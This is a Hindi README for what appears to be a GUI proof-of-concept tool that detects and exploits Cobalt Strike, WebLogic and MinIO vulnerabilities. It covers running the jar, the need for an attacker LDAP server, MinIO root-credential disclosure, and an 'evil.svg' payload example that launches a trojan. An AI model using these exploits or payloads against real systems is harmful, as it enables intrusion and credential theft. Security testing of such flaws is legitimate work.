
CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432 के लिए एक परीक्षण उपकरण
CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432 के लिए एक परीक्षण उपकरण इन तीन कमजोरियों के लिए ग्राफिकल भेद्यता पहचान और शोषण उपकरण
jar चलाने के लिए Java8 आवश्यक है
एकल लक्ष्य के लिए, एकाधिक IP स्कैनिंग के लिए उपयुक्त नहीं
पैकेजिंग करते समय weblogic भेद्यता शोषण के लिए wlfullclient.jar का संदर्भ लेना आवश्यक है, इसे स्वयं जोड़ना होगा
java -jar Gui-poc-test.jar
उपयोग विधि: दो बटन हैं - पहचान और शोषण, विभिन्न भेद्यताओं के लिए उपयोग विधि उपकरण इंटरफ़ेस में संकेत दिया गया है
लक्ष्य दर्ज करें, पोर्ट दर्ज करने की आवश्यकता नहीं है, डिफ़ॉल्ट 9000 है, बदला जा सकता है, स्रोत कोड GuiDemo.java:line144 देखें
MINIO_ROOT_USER और MINIO_ROOT_PASSWORD आदि प्रदर्शित करता है
लक्ष्य IP, पोर्ट, LDAP सर्वर पता दर्ज करें
पहचान:
नोट: भेद्यता शोषण के लिए स्वयं LDAP सर्वर (सार्वजनिक नेटवर्क) स्थापित करना आवश्यक है

पेलोड उदाहरण:
beacon.exe http://127.0.0.1:4444/evil.svg
परिणाम: Windows पर ट्रोजन चलाएं, Mac पर CS क्लाइंट ऑनलाइन हो जाता है
साथ ही CS सर्वर JAR पैकेज सामग्री निष्पादित करता है, कैलकुलेटर खुलता है

Windows पर CS एक्सेस पता लॉग होता है
